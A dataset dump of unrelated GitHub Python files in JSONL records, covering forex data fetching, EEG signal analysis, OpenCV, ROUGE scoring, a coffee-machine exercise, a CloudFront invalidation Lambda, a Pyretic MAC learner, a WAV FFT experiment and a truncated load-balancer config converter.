SGD)\")\ncurrencyCode = input();\n\nif not os.path.exists(currencyCode + \"_data\"):\n os.makedirs(currencyCode + \"_data\")\n \nif not os.path.exists(\"shared_gdp_data\"):\n os.makedirs(\"shared_gdp_data\")\n\nfor i in range(0, len(tickers)):\n \n tickers[i] = currencyCode + tickers[i];\n \n try:\n dfForex = getForexData(dt.datetime(2003, 12, 1), dt.datetime(2017, 10, 23), tickers[i]);\n dfForex.to_csv(currencyCode + \"_data\\\\\" + countries[i] + \".csv\");\n \n dfGdp = getGDPData(2003, 2016, countries[i])\n dfGdp.to_csv(\"shared_gdp_data\\\\\" + countries[i] + \".csv\");\n \n except Exception: \n print(tickers[i]);\n ","repo_name":"zbz-lvlv/currency_index","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37928060026","text":"import mne\nimport numpy as np\nfrom scipy.integrate import simps\nfrom numpy import loadtxt\nimport h5py\nimport time\nimport os \nimport matplotlib.pyplot as plt\nimport pickle\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.metrics import confusion_matrix, make_scorer, accuracy_score, precision_score, recall_score, f1_score, classification_report\nimport pandas as pd\nimport tensorflow as tf\nfrom scipy import signal\nfrom scipy.signal import butter, lfilter, periodogram, spectrogram, welch, filtfilt, iirnotch\nfrom scipy.stats import pearsonr, spearmanr\nimport matplotlib.mlab as mlab\nimport pandas as pd\nfrom SigQual import SigQual\n\n#%% Initiate an object from SigQual class\nObject = SigQual()\n\n#%% Read in data (Somno + Zmax)\n\n#####=========================== Reading data ============================#####\n\n# Main path\nmain_path = \"F:/Zmax_Data/features/\"\n\n# Read location of Somno data\nsubj_ids_somno = Object.read_txt(main_path = main_path, file_name = \"SigQual_Somno_data_loc\",\\\n dtype = 'str',delimiter='\\n') \n \n# Read Zmax data\nsubj_ids_zmax = Object.read_txt(main_path = main_path, file_name = \"SigQual_Zmax_data_loc\",\\\n dtype = 'str',delimiter='\\n') \n\n\n# Read subject_night id\nsubj_night = Object.read_txt(main_path = main_path, file_name = \"Subject_Night\",\\\n dtype = 'str',delimiter='\\n') \n\n# read event markers path to sync data\nsync_markers_main_path = \"F:/Zmax_Data/features/\"\nevent_markers = Object.read_excel(main_path = sync_markers_main_path, filename = \"Sync_periods\")\n\n\n#%% initializing dictionaries to save output\nSxx_somno_dic = dict()\nSxx_zmax_dic = dict()\nf_spect_somno_dic = dict()\nf_spect_zmax_dic = dict()\npsd_somno_dic = dict()\npsd_zmax_dic = dict()\nf_psd_somno_dic = dict()\nf_psd_zmax_dic = dict()\n\n#%% Main loop of analysis\n#####======================== Iterating through subjs=====================#####\nfor idx, c_subj in enumerate(subj_ids_somno):\n\n # define the current zmax data\n curr_zmax = subj_ids_zmax[idx]\n \n # define current somno data\n curr_somno = c_subj\n \n # Reading EEG left and right (Zmax)\n data_L = Object.read_edf_file(path_folder=curr_zmax, filename=\"EEG L\", preload = True)\n data_R = Object.read_edf_file(path_folder=curr_zmax, filename=\"EEG R\", preload = True) \n \n # Read somno data \n EEG_somno =Object.read_edf_file(path_folder=curr_somno, filename=\"\", preload = True) \n \n # Reading info header (Somno)\n Info_s, fs_somno, AvailableChannels_s = Object.edf_info(EEG_somno)\n \n # Reading info header (Zmax)\n Info_z, fs_zmax, AvailableChannels_z = Object.edf_info(data_R)\n \n # ======================= Data representation =========================== #\n \n# =============================================================================\n# Object.plot_edf(data = data_R, higpass = .1, lowpass = 30, duration = 30, n_channels =1)\n# Object.plot_edf(data = data_L, higpass = .1, lowpass = 30, duration = 30, n_channels =1)\n# Object.plot_edf(data = EEG_somno, higpass = .1, lowpass = 30, duration = 30, n_channels =4)\n# =============================================================================\n \n # ======================= Filter data before resample =================== #\n #Data_R_filt = Object.mne_obj_filter(data = data_R, sfreq = fs_zmax, l_freq = .1, h_freq=30, picks = AvailableChannels_z)\n \n # ======================= Resampling to lower freq ====================== #\n \n fs_res, data_R, EEG_somno = Object.resample_data(data_R, EEG_somno, fs_zmax, fs_somno)\n _ , data_L, _ = Object.resample_data(data_L, EEG_somno, fs_zmax, fs_somno)\n\n # ========================== Get data arrays ============================ #\n data_L_get = data_L.get_data()\n data_R_get = data_R.get_data()\n data_somno_get = EEG_somno.get_data()\n \n # ====================== Filtering resampled data ======================= #\n \n data_L_resampled_filtered = Object.butter_bandpass_filter(data_L_get, lowcut=.1, highcut=30, fs=fs_res, order = 2)\n data_R_resampled_filtered = Object.butter_bandpass_filter(data_R_get, lowcut=.1, highcut=30, fs=fs_res, order = 2)\n EEG_somno_resampled_filtered = Object.butter_bandpass_filter(data_somno_get, lowcut=.1, highcut=30, fs=fs_res, order = 2)\n\n # ====================== Synchronization of data ======================== #\n \n # required inputs to sync\n LRLR_start_zmax = event_markers['LRLR_start_zmax'][idx] #sec\n LRLR_end_zmax = event_markers['LRLR_end_zmax'][idx] #sec\n LRLR_start_somno = event_markers['LRLR_start_somno'][idx] #sec\n LRLR_end_somno = event_markers['LRLR_end_somno'][idx] #sec\n \n # sync\n lag, corr, Somno_reqChannel, zmax_data_R = Object.sync_data(fs_res, LRLR_start_zmax, LRLR_end_zmax, LRLR_start_somno, LRLR_end_somno,\\\n data_R_resampled_filtered, data_L_resampled_filtered, \\\n EEG_somno_resampled_filtered, AvailableChannels_s, save_name = subj_night[idx], \\\n RequiredChannels = ['F4:A1'], save_fig = False, dpi = 1000,\\\n save_dir = \"F:/Zmax_Data/Results/SignalQualityAnalysis/\",\n report_pearson_corr_during_sync = True,\\\n report_spearman_corr_during_sync = True,\\\n plot_cross_corr_lag = True)\n \n # ======================= Plot full sig after sync ====================== #\n \n full_sig_somno_before_sync = Somno_reqChannel\n full_sig_zmax_before_sync = zmax_data_R\n Object.plot_full_sig_after_sync(LRLR_start_somno, LRLR_start_zmax, fs_res,\n lag, full_sig_somno_before_sync,\n full_sig_zmax_before_sync)\n ","repo_name":"MahdadJafarzadeh/ssccoorriinngg","sub_path":"Quality analysis/SignalQualityAnalyzer.py","file_name":"SignalQualityAnalyzer.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38040510158","text":"import cv2 as cv\n\nimg = cv.imread('demo.jpg')\ncv.imshow('normal', img)\n\nresize_img = cv.resize(img, [200,200])\ncv.imshow('resize', resize_img)\n\ncropped_img = img[100:200, 200: 350]\ncv.imshow('croped', cropped_img)\n\ncv.waitKey(0)","repo_name":"harry10-git/OpenCV-FCC","sub_path":"week2/resize_crop.py","file_name":"resize_crop.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8088481830","text":"import torch\nimport re\nimport numpy as np\n\ndef convert_to_unicode(text):\n \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n if isinstance(text, str):\n return text\n elif isinstance(text, bytes):\n return text.decode(\"utf-8\", \"ignore\")\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef rouge(hyp, ref, n):\n scores = []\n for h, r in zip(hyp, ref):\n r = re.sub(r'[UNK]', '', r)\n r = re.sub(r'[’!\"#$%&\\'()*+,-./::?!《》;<=>?@[\\\\]^_`{|}~]+', '', r)\n r = re.sub(r'\\d', '', r)\n r = re.sub(r'[a-zA-Z]', '', r)\n count = 0\n match = 0\n for i in range(len(r) - n):\n gram = r[i:i + n]\n if gram in h:\n match += 1\n count += 1\n scores.append(match / count)\n return np.average(scores)\n\nif __name__ == \"__main__\":\n hyp = ['交大闵行校区一实验室发生硫化氢泄漏事故中无学生伤亡', '[UNK]史上最严的环保法[UNK]']\n ref = ['上海交大闵行校区:实验室换瓶时硫化氢泄漏送货员身亡', '#2015全国两会#傅莹:[UNK]史上最严[UNK]环保法是[UNK]有牙齿[UNK]的']\n print(rouge(hyp, ref, 2))\n\n ","repo_name":"kururuken/BERT-Transformer-for-Summarization","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"61"} +{"seq_id":"72951320833","text":"#!/usr/bin/env python3\n\nfrom logic.menu import Menu\nfrom logic.coffee_maker import CoffeeMaker\nfrom logic.money_machine import MoneyMachine\n\ncoffe_maker = CoffeeMaker()\ncharge = MoneyMachine()\nmenu = Menu()\n\nnot_stop = True\nwhile not_stop:\n request = input(f\"Please select one of the items: {menu.get_items()}: \").lower()\n if request == \"report\":\n coffe_maker.report()\n charge.report()\n elif request == \"off\":\n print(\"Entering maintenace mode, The machine will turn off\")\n not_stop = False\n else:\n info_request = menu.find_drink(request)\n if coffe_maker.is_resource_sufficient(info_request):\n if charge.make_payment(info_request.cost):\n charge.money_received += info_request.cost\n coffe_maker.make_coffee(info_request)\n","repo_name":"gabrielvictorio/PythonBootcamp","sub_path":"terminal_coffee_machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72273716354","text":"\nfrom __future__ import print_function\n\n# 배포 무효화(invalidation) 처리 \n# 2022. 06. 25 C.W.Jung \n\nimport boto3\nimport time\n\ndef lambda_handler(event, context):\n \n for items in event[\"Records\"]:\n path = \"/\" + items[\"s3\"][\"object\"][\"key\"]\n print(path)\n \n client = boto3.client('cloudfront')\n \n # CloudFront ID : EDTWAAAXXABIM \n # S3 Web Origin : ex) data.mydomain.com ( 용도 : Front Web )\n # CloudFront CNAME : ex) cdn.mydomain.com \n \n invalidation = client.create_invalidation(DistributionId='EDTWAAAXXABIM',\n InvalidationBatch={\n 'Paths': {\n 'Quantity': 1,\n 'Items': [path]\n },\n 'CallerReference': str(time.time())\n})\n","repo_name":"GaussJung/apistart","sub_path":"reference/lambda/invalidate_cdn_python/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36838214593","text":"\nfrom pyretic.lib.corelib import *\nfrom pyretic.lib.std import *\nfrom pyretic.kinetic.util.resetting_q import *\n\nfrom pyretic.kinetic.fsm_policy import *\nfrom pyretic.kinetic.drivers.json_event import JSONEvent\nfrom pyretic.kinetic.smv.model_checker import *\n\n\n#####################################################################################################\n# * App launch\n# - pyretic.py pyretic.kinetic.apps.mac_learner\n#\n# * Mininet Generation (in \"~/pyretic/pyretic/kinetic\" directory)\n# - sudo mininet.sh --topo=clique,3,3\n#\n# * Start ping from h1 to h2 \n# - mininet> h1 ping h2\n#\n# * Events are internal\n# - Mac Learner application will automatically react to \n# topology change (e.g., link down and up) emulated from Mininet, and successfully\n# forward traffic until no route exists between two hosts.\n#####################################################################################################\n\n\nclass mac_learner(DynamicPolicy):\n def __init__(self):\n max_port = 8\n port_range = range(max_port+1)\n def int_to_policy(i):\n return flood() if i==0 else fwd(i)\n pol_range = map(int_to_policy,port_range)\n\n ### DEFINE THE LPEC FUNCTION\n\n def lpec(f):\n return match(dstmac=f['dstmac'],\n switch=f['switch'])\n\n ## SET UP TRANSITION FUNCTIONS\n\n @transition\n def topo_change(self):\n self.case(occurred(self.event),self.event)\n self.default(C(False))\n\n @transition\n def port(self):\n self.case(occurred(self.event) & (V('port')==C(0)),self.event)\n self.case(is_true(V('topo_change')),C(0))\n\n @transition\n def policy(self):\n for i in port_range:\n self.case(V('port')==C(i),C(int_to_policy(i)))\n\n ### SET UP THE FSM DESCRIPTION\n\n self.fsm_def = FSMDef(\n topo_change=FSMVar(type=BoolType(),\n init=False,\n trans=topo_change),\n port=FSMVar(type=Type(int,set(port_range)),\n init=0,\n trans=port),\n policy=FSMVar(type=Type(Policy,set(pol_range)),\n init=flood(),\n trans=policy))\n\n ### DEFINE QUERY CALLBACKS\n\n def q_callback(pkt):\n host = pkt['srcmac']\n switch = pkt['switch']\n port = pkt['inport']\n flow = frozendict(dstmac=host,switch=switch)\n return fsm_pol.event_handler(Event('port',port,flow))\n\n ### SET UP POLICY AND EVENT STREAMS\n\n fsm_pol = FSMPolicy(lpec,self.fsm_def)\n rq = resetting_q(query.packets,limit=1,group_by=['srcmac','switch'])\n rq.register_callback(q_callback)\n\n super(mac_learner,self).__init__(fsm_pol + rq)\n\n\ndef main():\n pol = mac_learner()\n\n # For NuSMV\n smv_str = fsm_def_to_smv_model(pol.fsm_def)\n mc = ModelChecker(smv_str,'mac_learner') \n\n ## Add specs\n mc.add_spec(\"FAIRNESS\\n topo_change;\")\n mc.add_spec(\"SPEC AG (port=0 -> AG EF port>0)\")\n mc.add_spec(\"SPEC ! AG A [ port>0 U topo_change ]\")\n mc.add_spec(\"SPEC AG (port>0 -> A [ port>0 U topo_change ] )\")\n mc.add_spec(\"SPEC AG (port=1 -> A [ port=1 U topo_change ] )\")\n mc.add_spec(\"SPEC ! AG (port=2 -> A [ port=1 U topo_change ] )\")\n mc.add_spec(\"SPEC ! AG (port=1 -> EX port=2)\")\n mc.add_spec(\"SPEC AG (port=1 -> EF port=2)\")\n mc.add_spec(\"SPEC AG (port=1 -> A [ !(port=2) U port=0 ])\")\n mc.add_spec(\"SPEC AG (port=1 -> A [ !(port=2) U topo_change ])\")\n\n mc.save_as_smv_file()\n import datetime as dt\n n1=dt.datetime.now()\n mc.verify()\n n2=dt.datetime.now()\n\n print (n2-n1).microseconds\n\n return pol\n","repo_name":"littlepretty/Coursera-SDN-Assignments","sub_path":"ProgrammingAssignments/gardenwall_assignment_8/KineticAppExample/mac_learner.py","file_name":"mac_learner.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"7114693822","text":"# 1834\n\n# 와 시간초과 뜨는줄...\n# 식 짧게 만드는 것도 가능한가보다\n\nimport sys\n\nn = int(sys.stdin.readline())\nssum = 0\n\nfor i in range(1, n):\n ssum += i*(n+1)\n\nprint(ssum)\n","repo_name":"soohyeon21/study","sub_path":"BaekJoon/beginner/9_b1_1834.py","file_name":"9_b1_1834.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23414103281","text":"import sys\nimport logging\n\ndef magicIO(inName, outName): #this reads the guesses and cards\n\t#open file\n\tfin = open(inName)\n\tT = int(fin.readline())\n\tfout = open(outName,'w')\n\n\t#looping cases\n\tfor testcase in range(0,T):\n\t\tlogging.debug(\"Case #\" + str(testcase+1) + \":\")\n\t\t\n\t\t#reading flie\n\t\tans1 = int(fin.readline())\n\t\tfor row in range(0,ans1-1): #looping dump rows\n\t\t\tfin.readline()\n\t\trow1 = map(int, fin.readline().split()) #read row\n\t\tfor row in range(0, 4-ans1): #looping dump rows\n\t\t\tfin.readline()\n\t\tlogging.debug(\">> Row\" + str(ans1) + \": \" + str(row1))\n\n\t\tans2 = int(fin.readline())\n\t\tfor row in range(0,ans2-1): #looping dump rows\n\t\t\tfin.readline()\n\t\trow2 = map(int, fin.readline().split()) #read row\n\t\tfor row in range(0, 4-ans2): #looping dump rows\n\t\t\tfin.readline()\n\t\tlogging.debug(\">> Row\" + str(ans2) + \": \" + str(row2))\n\t\t\n\t\t#guess cases and output\n\t\tguess = magicTrick(row1, row2)\n\t\tresult= \"Case #\" + str(testcase+1) + \": \"\n\t\tif len(guess) == 1:\n\t\t\tresult = result + str(guess[0])\n\t\telif len(guess) > 1:\n\t\t\tresult = result + \"Bad magician!\"\n\t\telse:\n\t\t\tresult = result + \"Volunteer cheated!\"\n\t\tlogging.info(result)\n\t\tfout.write(result+\"\\n\")\n\n\t#done and closing\n\tfout.close()\n\tfin.close()\n\n\n\n\ndef magicTrick(row1, row2):\n\tresult = filter(lambda x: x in row1, row2)\n\treturn result\t\n\n\n\nif __name__ == '__main__':\n\tlogger = logging.getLogger()\n\tlogger.setLevel(logging.DEBUG)\n\n\tinName = \"example.in\"\n\toutName = \"output\"\n\tif len(sys.argv) == 2:\n\t\tinName = sys.argv[1]\n\telif len(sys.argv) > 2:\n\t\tlogging.error(\" Usage: solution.py filename\")\n\t\tsys.exit(0)\n\tlogging.info( \"Running MagicTrick: \" + inName + \" > \" + outName)\n\tmagicIO(inName, outName)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2550.py","file_name":"2550.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33892446705","text":"from aiohttp import web\n\n\nasync def handle(request):\n name = request.match_info.get(\"name\", \"Anonymous\")\n return web.json_response({\"name\": name})\n\n\napp = web.Application()\napp.add_routes([web.get(\"/{name}\", handle)])\n\n\ndef run():\n web.run_app(app)\n","repo_name":"dyens/aiohttp-vs-fastapi","sub_path":"aiohttp_vs_fastapi/aiohttp/simple_response.py","file_name":"simple_response.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17354087365","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n30/01/2018\r\n\r\ncd \\d_Development\\Python\\Scripts\\kata\\Kata_04_WavFileFFT\r\n\r\n@author: johnm\r\n\"\"\"\r\n\r\n\r\n#%%\r\n\r\nimport numpy as np\r\nimport scipy.io.wavfile as wv\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.fftpack import fft\r\n\r\n\r\n#%%\r\n\r\n# - Read the wav file into numpy array 'w'.\r\nfs, w = wv.read('LovetFaller.wav')\r\n\r\n# - Convert to a float.\r\nw = w.astype('float64')\r\n\r\n# - Show the number of channels, in some way.\r\nif len(w.shape) == 1:\r\n print(\"Number of Channels: 1\")\r\nelse:\r\n print(\"Number of Channels: {0}\".format(w.shape[1]))\r\n\r\n# - If more than one channel, convert to mono using a mean.\r\nif len(w.shape) == 2:\r\n w = w.mean(axis=1)\r\n\r\n# - Normalise on [-1.0, 1.0].\r\nw = w - np.mean(w)\r\nw /= max(abs(w))\r\n\r\n# - Visualise the data, using an appropriate step.\r\nplt.plot(w[::10])\r\n\r\n# - Choose a start point and time period to analyse\r\n# (JoMo: Consider the power of two thing.)\r\nt = 10.0\r\ndt = 0.25\r\n\r\nN = int(dt * fs)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nprint(\"N: {0}\".format(N))\r\n\r\n# - Display that period\r\n\r\n\r\n#%%\r\n# Check for drop-outs.\r\n\r\nnstep = 100\r\n\r\nplt.plot(w[::nstep])\r\n\r\nn = 4\r\nfig, axs = plt.subplots(n, 1, sharex=True, figsize=(8,2*n))\r\nfig.subplots_adjust(hspace=0)\r\n\r\nq = int(w.shape[0] / n)\r\n\r\nfor i in range(n):\r\n axs[i].plot(w[i*q:(i+1)*q:nstep])\r\n axs[i].set_yticks([])\r\n\r\nplt.show()\r\n\r\ndel i, n, nstep, q\r\ndel axs, fig\r\n\r\n\r\n#%%\r\n# Fourier trasform of a specific slice of time.\r\n\r\nt = 16.0\r\ndt = 0.25\r\n\r\nN = int(dt * f)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nws = w[int(t*f):int(t*f)+N]\r\nws -= np.mean(ws)\r\nws /= max(abs(ws))\r\n\r\nyf = fft(ws)\r\nyf = np.abs(yf)\r\nyf = yf[:NN]\r\nyf /= NN # JoMo: Check this\r\n\r\nxf = np.linspace(0.0, f/2, NN)\r\n\r\nmaxf = 2000\r\n\r\nn = int(maxf * N / f)\r\n\r\nxf = xf[:n]\r\nyf = yf[:n]\r\n\r\n#plt.plot(xf[:n], yf[:n])\r\nplt.plot(xf, yf)\r\n#plt.ylim(0, 0.1)\r\n\r\n\r\n#%%\r\n#\r\n# Recreate the sounds, in chunks\r\n#\r\n\r\ndt = 0.25\r\ntstart = 15.0\r\ntend = 30.0\r\n\r\n#dt = 0.01\r\n#tstart = 53.0\r\n#tend = 63.0\r\n\r\nthresh = 0.1\r\n\r\nmaxf = 2000\r\n\r\nN = int(dt * f)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nn = int(maxf * N / f)\r\n\r\nxf = np.linspace(0.0, f/2, NN)\r\nxf = xf[:n]\r\n\r\ntseg = np.linspace(0, dt, N)\r\n\r\nenv = np.sin(np.linspace(0, np.pi, N))\r\n\r\nwr = np.array([])\r\n\r\n# Smoothing envelope\r\n# Type 1\r\nenv = np.sin(np.linspace(0, np.pi, N)) ** 1\r\n# Type 2\r\n#frac = 10\r\n#env = np.zeros(N) + 1.0\r\n#env[:int(N/frac)] = np.linspace(0, 1, int(N/frac))\r\n#env[-int(N/frac):] = np.linspace(1, 0, int(N/frac))\r\n#env = env**0.1\r\n\r\n#fdict = {}\r\n\r\nfor t in np.arange(tstart, tend, dt):\r\n\r\n print(t)\r\n\r\n # Use the normalised data.\r\n ws = wn[int(t*f):int(t*f)+N]\r\n \r\n yf = fft(ws)\r\n yf = np.abs(yf)\r\n yf = yf[:NN]\r\n yf /= NN\r\n \r\n yf = yf[:n]\r\n \r\n threshold = thresh * max(yf) # Bear in mind that this will vary between segments\r\n\r\n q = zip(xf[yf >= threshold], yf[yf >= threshold])\r\n #fdict[t] = (threshold, len(yf[yf >= threshold]), q)\r\n\r\n wseg = np.zeros(N)\r\n for freq, weight in q:\r\n wseg += weight * np.sin(2 * np.pi * freq * tseg)\r\n wseg *= env\r\n\r\n wr = np.append(wr, wseg, axis=0)\r\n\r\nwr = wr / abs(wr).max()\r\nwr = (32000 * wr).astype('int16')\r\n\r\n# Tidy this...\r\nwx = wn[int(tstart*f):int(tstart*f)+wr.shape[0]]\r\nwx = wx / abs(wx).max()\r\nwx = (32000 * wx).astype('int16')\r\n\r\nwmix = np.vstack((wr, wx)).T\r\n\r\nwv.write('zz_recreated.wav', f, wr)\r\nwv.write('zz_recreated_cmp.wav', f, wmix)\r\n\r\n\r\n#%%\r\n#\r\n#\r\n#\r\n\r\ndt = 0.25\r\n\r\nN = int(dt * f)\r\nN = N - N % 2\r\nNN = int(N / 2)\r\n\r\nxf = np.linspace(0.0, f/2, NN)\r\n\r\nmaxf = 2000\r\nn = int(maxf * N / f)\r\n\r\nnchart = 21\r\n\r\nfig, axs = plt.subplots(nchart, 1, sharex=True)\r\nfig.subplots_adjust(hspace=0.35)\r\n\r\nfig.set_figheight(2 * nchart)\r\nfig.set_figwidth(10)\r\n\r\ni = 0\r\nfor t in np.linspace(15, 20, nchart):\r\n\r\n ws = w[int(t*f):int(t*f)+N]\r\n ws -= np.mean(ws)\r\n ws /= max(abs(ws))\r\n\r\n yf = fft(ws)\r\n yf = np.abs(yf)\r\n yf = yf[:NN]\r\n yf /= NN # JoMo: Check this\r\n\r\n axs[i].plot(xf[:n], yf[:n])\r\n #axs[i].bar(range(q.shape[1]), q[i], 0.99)\r\n #axs[i].set_yticks([0, np.ceil(np.max(yf[:n]))])\r\n #axs[i].set_yticks([])\r\n #axs[i].set_ylim(0, 1)\r\n axs[i].set_title(\"t={0:.2f}\".format(t))\r\n \r\n i += 1\r\n\r\nplt.show()\r\n\r\n\r\n#%%\r\n#\r\n# Problems\r\n# 1) This fails if more than one item has the maximum value.\r\n# See the example in the next cell.\r\n# 2) The sum of the mid-point an neighbouring points is \r\n# incorrect if di=1 and there are peaks at i and i+2, \r\n# because the values at point i+1 is shared twice, between\r\n# the two points.\r\n#\r\n\r\nyq = np.zeros(n)\r\nyr = np.zeros(n)\r\n\r\nm = 1.5\r\ndi = 1\r\n\r\nfor i in range(di, n-di):\r\n if yf[i] == max(yf[i-di:i+di+1]):\r\n #yq[i] = yf[i]\r\n yq[i] = sum(yf[i-1:i+2])\r\n\r\nfor i in range(di, n-di):\r\n if yf[i] == max(yf[i-di:i+di+1]):\r\n if yf[i] > m * np.mean(yf[i-di:i+di+1]):\r\n #yr[i] = yf[i]\r\n yr[i] = sum(yf[i-1:i+2])\r\n\r\nsq = 0\r\nnq = 110\r\n\r\nplt.bar(range(nq), yf[sq:sq+nq])\r\n#plt.xticks(xf[sq:sq+nq])\r\nplt.show()\r\nplt.bar(range(nq), yq[sq:sq+nq])\r\nplt.show()\r\nplt.bar(range(nq), yr[sq:sq+nq])\r\nplt.show()\r\n\r\n\r\n#%%\r\n\r\nst = 2**(1/12) - 1\r\n\r\nprint(\" Amp\\t Semi\\t f\\t 2f\\t 3f\\t 4f\")\r\nprint(\"-----\\t-----\\t-----\\t-----\\t-----\\t-----\")\r\n\r\n# Why round the numbers if they are then displayed to a \r\n# certain number of decimal places?\r\n# Am I planning to look for integer multiples?\r\n\r\nfor i in range(len(yr)):\r\n if yr[i] > 0:\r\n print(\"{0:5.0f}\\t{1:5.0f}\\t{2:5.0f}\\t{3:5.0f}\\t{4:5.0f}\\t{5:5.0f}\".format(\r\n round(1000*yr[i], 0), \r\n round(st * xf[i], 0),\r\n round(1 * xf[i], 0),\r\n round(2 * xf[i], 0),\r\n round(3 * xf[i], 0),\r\n round(4 * xf[i], 0)\r\n ))\r\n\r\ndel st\r\n\r\n\r\n#%%\r\n\r\n# Keep this example - it shows it failing.\r\nyf = [0,0,1,1,1,5,5,5,5,5,5,1,1,1,0,0]\r\n\r\nn = len(yf)\r\nyq = np.zeros(n)\r\n\r\nm = 1.5\r\ndi = 2\r\n\r\nfor i in range(di, n-di):\r\n if yf[i] == max(yf[i-di:i+di+1]):\r\n if yf[i] > m * np.mean(yf[i-di:i+di+1]):\r\n yq[i] = max(yf[i-di:i+di+1])\r\n\r\nplt.bar(range(n), yf, 0.5)\r\nplt.show()\r\nplt.bar(range(n), yq, 0.5)\r\nplt.show()\r\n\r\n\r\n#%%\r\n\r\nt = 19.5\r\ndt = 1.2\r\n\r\nN = int(dt * f)\r\n\r\nws = w[int(t*f):int(t*f)+N]\r\n#ws -= np.mean(ws)\r\n#ws /= max(abs(ws))\r\n\r\nplt.plot(ws)\r\n\r\n\r\n#%%\r\n\r\nq1 = np.array([])\r\nq2 = np.array([1,2,3])\r\n\r\nq1 = np.append(q1, q2, axis=0)\r\nq1 = np.append(q1, q2, axis=0)\r\nq1 = np.append(q1, q2, axis=0)\r\n \r\n\r\n#%%\r\n\r\nfrac = 10\r\nenv = np.zeros(N) + 1.0\r\nenv[:int(N/frac)] = np.linspace(0, 1, int(N/frac))\r\nenv[-int(N/frac):] = np.linspace(1, 0, int(N/frac))\r\nenv = env**0.1\r\n\r\nplt.plot(env)\r\n\r\n\r\n#%%\r\n\r\n#\r\n# End Of File\r\n#","repo_name":"johnamolloy/hello-world","sub_path":"_kata_04_WorkInProgress.py","file_name":"_kata_04_WorkInProgress.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6188733884","text":"import math\n\ndef cakes(recipe, available):\n isSubset = set(recipe).issubset(available)\n quantity = []\n\n if(isSubset):\n for requiredProduct, requiredNumber in recipe.items():\n for availableProduct, availableNumber in available.items():\n if requiredProduct == availableProduct:\n div = math.floor(availableNumber/requiredNumber)\n quantity.append(div)\n return min(quantity)\n else:\n return 0\n\nrecipe = {\"flour\": 500, \"sugar\": 200, \"eggs\": 1}\navailable = {\"flour\": 1200, \"sugar\": 1200, \"eggs\": 5, \"milk\": 200}\nprint(cakes(recipe, available))","repo_name":"tope96/codewars","sub_path":"src/pete_the_baker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10437892925","text":"import os\nimport re\n\nf5_file = open(os.path.normpath(\"python-scripts/A10-scripts/config-parts/GTM/LB788/LB788-service-ip.txt\"))\n\nnorm_file = str(f5_file.read()).split(\"# }\")\n\ndef remove_caractere(linha):\n caracteres = [\"\\n\",'\"',\" \",\"[\",\"]\",\"'\",\"#\"]\n for i in caracteres:\n linha = linha.replace(i,\"\")\n return linha\n\ndef altera_porta(linha):\n new_port =\"\"\n service_dict = {\n \"ftp\" : \"21\",\n \"interwise\" : \"7778\",\n \"webcache\" : \"8080\",\n \"http\": \"80\",\n \"https\":\"443\",\n \"tproxy\":\"8081\",\n \"smtp\":\"25\",\n \"afs3-prserver\":\"7002\",\n \"cbt\":\"7777\",\n \"any\":\"\",\n \"commplex-main\":\"5000\",\n \"sec-t4net-clt\":\"7778\",\n \"ndmp\":\"10000\",\n \"scp-config\":\"10001\",\n \"documentum\":\"10002\",\n \"irisa\":\"11000\",\n \"metasys\":\"11001\" \n }\n if linha in service_dict:\n new_port = service_dict[linha] \n else:\n new_port = linha\n return new_port \n\ndef get_info(file):\n nome_vs = file.split(\"{\")[0]\n if \"CEN\" in nome_vs:\n nome_vs = remove_caractere(nome_vs)\n nome_vs = str(nome_vs).split(\"/\")[2]\n nome_vs = f\"cen-{nome_vs}\"\n else:\n nome_vs = remove_caractere(nome_vs)\n nome_vs = str(nome_vs).split(\"/\")[2]\n nome_vs = f\"tsm-{nome_vs}\"\n ip_port = file.split(\"{\")[1]\n ip_port = list(filter(None,str(ip_port).split(\" \")))[2]\n ip = str(ip_port).split(\":\")[0]\n port = remove_caractere(str(ip_port).split(\":\")[1])\n port = altera_porta(port)\n \n \n return [nome_vs, ip, port]\n\n\n\n\n\ndef write_vIPs (vs_list, verifica_vs, vs_limpo):\n itens = get_info(vs_list)\n if itens[1] in verifica_vs:\n a10_vIP_input =\" \"\n 